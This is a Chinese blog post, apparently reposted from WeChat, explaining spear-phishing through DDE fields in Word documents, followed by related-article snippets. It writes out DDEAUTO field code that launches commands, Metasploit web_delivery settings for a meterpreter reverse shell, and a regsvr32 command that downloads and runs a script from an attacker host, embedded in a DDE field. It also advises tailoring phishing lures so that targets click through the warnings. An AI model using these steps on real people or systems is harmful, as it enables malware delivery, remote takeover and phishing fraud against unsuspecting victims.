鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

最新推荐文章于 2024-05-28 17:11:53 发布
最新推荐文章于 2024-05-28 17:11:53 发布
阅读量540 收藏 2
点赞数 1
分类专栏: 笔记 文章标签: 安全
原文链接:https://mp.weixin.qq.com/s/O6n2z0Yp7hTSxQWGWJzBdg
版权

鱼叉钓鱼:利用 Office 文档进行 DDE 攻击

DDE

DDE 是一个自定义字段,用户可插入文档。这些字段允许用户输入简单的说明,包括插入到新文档中的数据及插入位置。攻击者可以创建包含DDE字段的恶意Word文件(而不需要打开另一个Office应用程序)、打开命令提示符和运行恶意代码。

通常情况下,Office应用程序会显示两项告警内容。第一个是关于包含指向其他文件的链接的文档告警,第二个是关于打开远程命令提示符的错误告警。

在MSWord和MSExcel里,我们可以使用DDE来执行命令。

DDE 攻击演示

首先通过 word 文档设置一个域代码:crlt+f9,或者选中“插入”-“文件部件”-“域”,选中第一个 = (Formula) 然后右键切换域代码来编辑代码,插入下面的内容:
在这里插入图片描述
然后再里面输入测试代码:

DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

在这里插入图片描述

##保存后重新打开 word 文档:
在这里插入图片描述

在这里插入图片描述

##点击两次“是”就会调用 DDE 执行 calc.ex:

在这里插入图片描述

Metasploit + DDE = Meterpreter

那如果是要反弹 shell 的话需要借助 MSF 来帮助我们:

msf > use exploit/multi/script/web_delivery
msf > set target 3
msf > set payload windows/meterpreter/reverse_tcp_uuid 
msf > set lhost 192.168.201.237
msf > set lport 8081
msf > exploit -j 
[*] Exploit running as background job 0.

在这里插入图片描述

regsvr32 /s /n /u /i:http://192.168.201.237:8080/sgnNsSYg.sct scrobj.dll

然后我们在 DDE 里插入代码(注意引号):

DDEAUTO c:\\windows\\system32\\cmd.exe "/k regsvr32 /s /n /u /i:http://192.168.201.237:8080/sgnNsSYg.sct scrobj.dll"

在这里插入图片描述
最后保存再打开 word 文档即可反弹 shell 到 msf :
在这里插入图片描述

结尾

DDE 攻击比较老了,不过在渗透中难免还是会碰到;关于 DDE 攻击的缺点就在于目标必须要点击两次“是”才能够执行 DDE 代码进行攻击,而至于怎样才能让目标心甘情愿的点击,那就靠各位如何包装钓鱼邮件,和如何实施了,一份逼真的钓鱼鱼饵在于你搜集到目标的信息是否准确真实,在此不多解释大家都懂。

weixin_45575473
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用PowerShell Empire实现Word文档DDE攻击控制(简单没啥用)
墨痕诉清风的博客
04-09 455
近期,有安全人员发现了一种DynamicData Exchange (DDE)协议绕过MSWord和MSExcel宏限制,不需使用MSWord和MSExcel漏洞,就能实现在Office文档中执行恶意命令目的。在这篇文章中,我将展示如何利用基于Empire的PowerShell来对Word文档进行“伪装”攻击,可能还有其它实现方法,我仅作个抛砖引玉。 创建Empire Listener 创建一个Empire Listener监听线程,可点此查看Empire的使用说明。 当监听线程启动运行之后,运行
在野外进行鱼叉钓鱼:关于人格,鱼叉钓鱼的自我效能和鱼叉钓鱼攻击的脆弱性的真实世界研究-研究论文
05-20
在这项研究中,对组织环境中的员工进行了真实的鱼叉式网络钓鱼攻击,以检查用户的个性,态度和感知的效率因素如何影响他们遭受此类攻击的趋势。 鱼叉式网络钓鱼攻击比常规的网络钓鱼攻击更为复杂,因为它们使用有关...
ms office DDE攻击与防御
09-17
动态数据交换(DDE),它是在Microsoft Windows操作系统中实现的客户端/服务器通信方法,自1987年早期的Windows 2.0基于Windows Messaging,并使用其功能来启动双方之间的连接,服务器侦听某些主题和消息,对其进行响应到客户端并终止连接。 它被用于向诸如办公产品和浏览器的应用程序发送参数,发送命令到shell -explorer-来创建开始菜单组和链接,并在不同的应用程序和服务之间进行集成。 Microsoft将DDE定义为允许应用程序共享数据的一组消息和准则。Microsoft文档说明,应用程序可以使用DDE协议进行一次数据传输,以便应用程序在新数据可用时将更新发送给彼此。
Office DDE 攻击
10-24 208
Authors: Etienne Stalmans, Saif El-Sherei What if we told you that there is a way to get command execution on MSWord without any Macros, or memory corruption?! Windows provides several methods ...
谨防钓鱼——OFFICE DDE复现
tempulcc的博客
09-08 485
OFFICE DDE,这是微软的 OFFICE中的一个功能,能过够执行公式,插入远程图片,也可以用来执行恶意代码,即有了OFFICE DDE漏洞,cve编号:CVE-2017-11882,刚开始漏洞被发现的时候,微软并没有认为是漏洞,认为这是OFFICE软件的正常功能。 正好今天学习metasploit,拿这个漏洞练练手 msfconsole search office-dde use exploit/windows/fileformat/office_dde_delivery set payload
使用Office进行DDE攻击
Sven的忘却日记
06-13 1957
当你打开恶意docx文件时,会有提示信息,不过通过解析路径的手段,把可疑部分隐藏了。 这个提示信息,看起来是启动我Word安装目录下的一个程序,普通人觉得,Word启动它自己目录下的程序,应该很正常呀!于是就点了是 此时用procexp查看进程列表,恶意的代码已经执行了~ 如果用7z来打开这个docx文件,可以看到里面的footer.xml文件中包含的恶意部分 DDEAUTO "C:\\P...
2017年鱼叉攻击邮件研究报告.pdf
08-08
第一章 研究背景 第二章 鱼叉攻击邮件分析 ...第四章 鱼叉攻击邮件携带文档攻击案例 一、 利用漏洞攻击案例 二、 带毒宏攻击案例 三、 带交互的恶意对象攻击案例 四、 嵌入带毒程序攻击案例 第五章 结语
几种诱骗攻击手段(鱼叉、水坑、诱骗)
07-06
几种诱骗攻击手段(鱼叉、水坑、诱骗)说明
红队行动之鱼叉攻击SMTP_Relay.pdf
09-11
红队行动之鱼叉攻击SMTP_Relay 安全防护 安全意识教育 安全众测 安全研究 自动化
pompa:功能齐全的鱼叉式网络钓鱼工具包-Web前端
04-27
功能齐全的鱼叉式网络钓鱼工具包-Web前端 注意:这仅是Web前端。 请使用存储库作为完整的部署基础,并阅读 。 先决条件 您需要在计算机上正确安装以下物品: (使用npm) 安装 git clone ...
Word一漏洞被用来实施“鱼叉钓鱼攻击
冷血书生的专栏
06-08 2994
据国外媒体报道,在安全公司爆出微软Word软件中的一个安全漏洞被黑客利用来实施令人恐惧的“鱼叉钓鱼攻击后,微软公司日前表示将紧急推出一个补丁,微软还建议用户暂时在安全模式下使用Word。 微软的月度补丁发布日是6月13日。不过,在听闻这个令人震惊的消息后,微软已经决定紧急发布了一个补丁,专门修补发生在Word XP和Word 2003中的漏洞。此外,为了防止黑客在补丁发布之前利用漏洞实施攻
Word文档进行XXE攻击
yggcwhat
05-05 2211
Word文档进行XXE攻击
使用powershell Client进行有效dy
citelao的博客
03-22 780
使用powershell Client进行有效钓鱼 Evi1cg · 2015/09/11 16:40 0x00 简介 Powershell是windows下面非常强大的命令行工具,并且在windows中Powershell可以利用.NET Framework的强大功能,也可以调用windows API,在win7/server 2008以后,powershell已被集成在系统当
word中的dde
weixin_33816300的博客
04-20 536
在word中使用快捷键ctrl+f9 打开后有个大括号,在里边输入系统命令可以执行。配合powershell可以做很多事。 现象(一) 现象(二) 执行成功 解决方案(1): 在word选项中,勾选显示域代码而非域值。这样在打开的文档中可以直接看到域代码。 解决方案(2):关闭自动更新链接 解决方案(3):注册表彻底禁用 来自:https://gist.github.com/wdorman...
内网安全--域渗透准备知识
金灰的博客
05-22 712
通过域成员主机,定位出域控制器 IP 及域管理员账号,利用 域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性, 定位出域管理员登陆过的主机 IP,设法从域成员主机内存中 dump 出域管理员密码,进 而拿下域控制器、渗透整个内网.某个域用户需要使用 viso 软件进行绘图操作,于是联系网络管理员进行安装,网络管理 员采用域管理员身份登录了域成员主机,并帮助其安装了 viso 软件,于是这个有计算机 基础的员工,切换身份登录到了本地计算机的管理员,后执行。
简单3步,ERP、OA、CRM等客户端,安全远程访问服务端
oray2013的专栏
05-22 284
然而,如何确保在不同地点的员工都能安全、便捷地访问公司内网的C/S(Client/Server)架构办公系统,是一个亟待解决的问题。采用贝锐花生壳内网穿透服务,可以简化这些步骤,使得远程访问变得异常简单。无需公网IP,无需繁琐的路由和网关配置,简单三步,即可实现远程访问。目前,除了上述举例的ERP系统,市面上主流C/S(Client/Server)架构办公系统均可搭配贝锐花生壳实现远程访问。传统的远程访问解决方案往往需要复杂的网络配置,包括公网IP的申请、路由和网关的设置等。
智能视频监控技术为游泳馆安全护航,助力安全管理新升级
最新发布
TSINGSEE青犀视频官方技术博客
05-28 443
通过高清摄像头、视频监控平台和AI智能分析系统的结合,实现了对游泳馆内各区域的全面覆盖和实时监控,为游泳馆的安全管理提供了有力支持。
浏览器提示网站不安全怎么办?有什么解决办法吗?
JoySSL230907的博客
05-28 778
一招教你轻松解决
什么是网络钓鱼?什么是鱼叉钓鱼和水坑攻击?
05-13
网络钓鱼是指利用虚假的网站、电子邮件等手段,欺骗用户输入敏感信息,如用户名、密码、信用卡号等,从而达到非法获取用户账号或财产的行为。 鱼叉钓鱼是一种针对特定个人或组织的网络钓鱼攻击方式,攻击者会伪装成目标个人或组织的信任来源,通过发送虚假电子邮件或信息等方式,引诱目标用户点击恶意链接、下载恶意软件或输入敏感信息。 水坑攻击则是一种通过创建虚假的登录页面或者下载链接等方式,欺骗用户输入敏感信息,从而达到非法获取用户账号或财产的行为。攻击者会在一个常用的网站上注入恶意代码,当用户访问该网站时,恶意代码会自动加载并将用户重定向到虚假页面或下载链接,从而实现攻击目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值